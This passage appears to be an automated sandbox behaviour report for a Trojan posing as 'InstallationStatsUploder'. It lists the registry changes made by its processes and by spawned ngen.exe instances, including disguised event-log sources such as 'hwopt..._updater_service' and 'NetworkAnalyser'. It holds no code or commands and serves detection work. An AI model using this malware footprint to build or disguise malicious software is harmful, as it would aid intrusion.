The process InstallationStatsUploder_12052016001648.exe:1848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 DE F0 A9 00 A1 59 EF 0A AF 09 35 5B 56 5A CB"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:508 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 33 0B D0 07 E7 E6 7F 40 8A C4 69 B0 3D FA 25"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:1292 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A6 2C ED FE 93 8E 5D A8 7E 36 2E 36 CB 00 1B A5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process InstallationStatsUploder_12052016001648.exe:1400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application]
"Sources" = "hwopt12052016001648_updater_service, hwopt12052016001648, WSH, WMIAdapter, WMI.NET Provider Extension, WmdmPmSN, WinMgmt, Winlogon, Windows Product Activation, Windows 3.1 Migration, WebClient, VSSetup, VSS, vmtools, vmStatsProvider, VBRuntime, Userinit, Userenv, TPVCGateway, Tlntsvr, System.ServiceModel.Install 3.0.0.0, System.ServiceModel 4.0.0.0, System.ServiceModel 3.0.0.0, System.Runtime.Serialization 4.0.0.0, System.Runtime.Serialization 3.0.0.0, System.IO.Log 4.0.0.0, System.IO.Log 3.0.0.0, System.IdentityModel 4.0.0.0, System.IdentityModel 3.0.0.0, SysmonLog, Starter, SpoolerCtrs, Software Restriction Policies, Software Installation, ServiceModel Audit 4.0.0.0, ServiceModel Audit 3.0.0.0, SecurityCenter, SclgNtfy, SceSrv, SceCli, safrslv, SAFrdms, RPC, Remote Assistance, PerlMsg, PerfProc, PerfOS, PerfNet, Perfmon, Perflib, PerfDisk, Perfctrs, Offline Files, Oakley, ntbackup, MSSQLSERVER/MSDE, MSSHA, MsiInstaller, MSDTC Client, MSDTC, mnmsrvc, Microsoft.Transactions.Bridge 4.0.0.0, Microsoft.Transactions.Bridge 3.0.0.0, Microsoft H.323 Telephony Service Provider"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\NetworkAnalyser[INSTALL_UN_INSTALL_STATU_SUPDATER]]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 3C D8 3C 7E 39 DF C4 8E 6E 12 23 D2 2F 5C A1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\InstallationStatsUploder_12052016001648\DEBUG]
"Trace Level" = ""
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\NetworkAnalyser[APP_SETTINGS]]
"EventMessageFile" = "%WinDir%\Microsoft.NET\Framework\v2.0.50727\EventLogMessages.dll"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\InstallationStatsUploder_12052016001648\DEBUG]
"Trace Level"
The process EditBinx86.exe:960 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA E5 8E F0 E7 CA EA 3F CE 75 75 51 8C 22 70 5A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process EditBinx86.exe:2012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 E5 84 5C A6 43 C4 15 B2 24 7E 83 52 2E 9C 3B"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
The process mofcomp.exe:2684 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 9D 1A 22 B3 D5 F3 83 3A C0 4E DF 55 77 DC 48"
The process ngen.exe:332 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "31 52 8F 0E 0F FA 54 00 3C E6 E9 85 AF CF D1 41"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:276 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 42 5E 7B 1C 3C ED 78 F2 D8 6D 10 D1 D6 E7 A8"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
The process ngen.exe:2092 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC BC 87 5E C4 4B 42 DA 03 E4 1B 73 41 F3 35 30"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
The process ngen.exe:3300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 A9 17 10 EE 21 29 53 AE EB 9E FC 90 17 0B 63"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
"Status" = "2"
The process ngen.exe:2136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 09 10 67 51 15 9D 57 7A E3 D9 52 55 2E AA DB"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:3212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 23 51 0A C4 D3 1B 8E D4 36 75 54 CC B8 14 3C"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"
The process ngen.exe:2056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D C7 50 60 27 4B FE 93 B0 6B 67 B2 C8 0C 81 3C"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:3340 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 66 A5 80 52 1D 5B 49 5E AA CC B0 11 26 CC B2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
The process ngen.exe:2248 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9C 1F 51 28 15 7E 25 A2 89 F6 BD 7D 1A 9F B1 FF"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:3160 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "96 78 37 B4 FA 2C 40 32 08 6C 84 2A 83 4B AC 76"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2112 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 2C 28 A0 93 3F 82 43 91 58 77 A9 CE A5 93 A0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
"Scenario" = "32"
The process ngen.exe:2240 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 9B 37 65 8B E3 AF 8E B6 40 00 D9 72 1D 5E C1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
The process ngen.exe:3232 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D E4 30 C1 23 15 FA 7F 14 8A 61 97 FF 5F DC 4F"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 6E 41 68 A3 E8 49 37 B2 5D DE DD E2 CB C2 65"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:1496 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 74 96 77 0C 45 17 E3 2A 02 94 A4 CA 17 AE 2F"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
The process ngen.exe:2188 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 75 9E 1D C8 09 E6 CF 31 04 66 46 2F 29 63 10"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
The process ngen.exe:2212 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 36 76 ED 77 8E 25 B8 EE 75 82 97 3D 45 CF 7C"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Scenario" = "32"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "2"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
The process ngen.exe:2276 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "17 A5 77 22 60 9E B8 46 4A 13 34 46 7E C4 A3 37"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority" = "1"
